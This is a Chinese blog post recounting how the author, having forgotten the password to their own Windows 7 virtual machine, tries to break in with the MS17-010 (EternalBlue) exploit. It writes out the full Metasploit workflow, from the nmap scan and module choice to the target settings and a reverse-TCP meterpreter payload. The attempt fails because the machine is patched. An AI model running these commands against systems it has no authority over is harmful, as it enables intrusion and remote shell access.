win7忘记密码_通过MS17-010打进去_创建管理员账户

今天用虚拟机的时候发现忘记密码了,服了,打一下,顺便记录一下sb经过。

最后是通过其本身镜像解决,或者用u盘做一个PE

✅第一步:工具准备

  • kali ( msfconsole美少妇

第二步:漏洞扫描

复制代码
nmap -p 445,3389 192.168.200.0/24 -O

本来想用08_067,改用永恒之蓝

第三步: MS17-010

🔎 打开Metasploit控制台

复制代码
msfconsole

🔎查找漏洞模块

复制代码
search eternalblue

👉 推荐选择

  • 第一次打:选择 0

    use exploit/windows/smb/ms17_010_eternalblue //use 0

这是最经典、最直接的永恒之蓝利用方式,最常用。

👉 0 模块打不进去:

  • 选择 1

    use exploit/windows/smb/ms17_010_psexec //use 1

它结合了 SMB 执行与永恒之蓝漏洞,有时能绕过部分系统限制。

👉 只检测:

  • 选择 3

    use auxiliary/scanner/smb/smb_ms17_010 //use 3

检测目标是否存在漏洞

👉 如果目标已经被种下 DoublePulsar 后门:

  • 选择 4

    use exploit/windows/smb/smb_doublepulsar_rce //use 4

利用植入的后门远程执行代码。

最佳顺序推荐(保险打法):

  1. 先用 auxiliary/scanner/smb/smb_ms17_010 扫描确认

  2. exploit/windows/smb/ms17_010_eternalblue

  3. 如果不成功,改用 exploit/windows/smb/ms17_010_psexec

像不正常情况下像我就是知道win7并且开启了445我就直接打了先说

🔎找到后使用

复制代码
use exploit/windows/smb/ms17_010_eternalblue  //use 0

🔎在 Metasploit 中,如果你想查看当前模块有哪些可设置的参数(选项),需要用命令:

设置攻击参数

cs 复制代码
set RHOSTS 192.168.200.128
set LHOST 你的攻击机IP
set LPORT 4444   # 端口随意,一般用 4444
set payload windows/x64/meterpreter/reverse_tcp

⚠ 如果目标系统是 32 位,可以改用:

cs 复制代码
set payload windows/meterpreter/reverse_tcp

查看配置是否正确:

cs 复制代码
show options

发起攻击

cs 复制代码
exploit

打不进去

选系统

还是打不进去

🔎为什么Win7(2009_2025)、开启445,结果却显示"不存在漏洞"?

🔎如何验证 SMBv1 是否真的开启?

可以用 smbclient 工具列出 Windows 共享**:**

cs 复制代码
smbclient -L //192.168.200.128 -N

如果 StateDisabled,那就无法利用永恒之蓝。

如果确认 SMBv1 被禁用,可以尝试:

攻击 SMBv2 协议相关漏洞,如:

  • SMB Signing 绕过

  • MS17-010 失败后可以尝试 ms17_010_psexec (编号1的模块)

cs 复制代码
use exploit/windows/smb/ms17_010_psexec

报错

cs 复制代码
[-] 192.168.200.128:445 - Unable to find accessible named pipe!

|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 放弃,永恒之蓝(EternalBlue)利用的是 SMBv1 协议的漏洞(MS17-010),如果目标没有开启 SMB 服务(即使开放了 445 端口),那么永恒之蓝也无法成功利用。 #### 关键点: * 445端口开放:端口 445 本身只是 SMB 服务的端口,表示目标机器上可能开放了 SMB 服务,但并不意味着 SMB 服务一定处于可用状态。如果没有启用 SMB 服务,攻击就无法进行。 * SMB 服务:攻击需要依赖 SMB 服务中的"命名管道"来进行漏洞利用。如果目标关闭了 SMB 服务或没有开放可用的命名管道,那么漏洞无法被触发。 总结起来,如果目标没有开启 SMB 服务,即使 445 端口开放,永恒之蓝也无法攻击成功 |

这个win7是打补丁的。

相关推荐
Likeadust14 小时前
私有化视频会议系统/智能会议管理系统EasyDSS集群通话助力各行业安全高效远程协作
安全
审判长烧鸡16 小时前
【Go工具】go-playground是什么组织?官方的?
开发语言·安全·go
JiaWen技术圈17 小时前
网站用户注册行为验证码方案
运维·安全
百度智能云技术站17 小时前
百度 Agent 安全中心:构筑企业智能体的安全底座
人工智能·安全·dubbo
视觉&物联智能18 小时前
【杂谈】-企业人工智能超越实验:安全拓展的实践路径
人工智能·安全·aigc·agent·agi
KnowSafe18 小时前
2026年SSL证书市场便宜且安全的SSL证书调研
网络协议·安全·ssl
@insist12318 小时前
信息安全工程师-云计算安全核心知识框架
安全·云计算·软考·信息安全工程师·软件水平考试
GMH7896620 小时前
1600W防水型对流电散热器,实用又安全吗?
安全·冀明昊暖气片·暖气片厂家·河北暖气片厂家·对流电散热器
志栋智能20 小时前
超自动化巡检:为智能运维(AIOps)铺平道路
运维·安全·自动化
幽络源小助理20 小时前
全新UI 阅后即焚V2正式版系统源码_全开源_安全加密传输
安全·ui·开源·php源码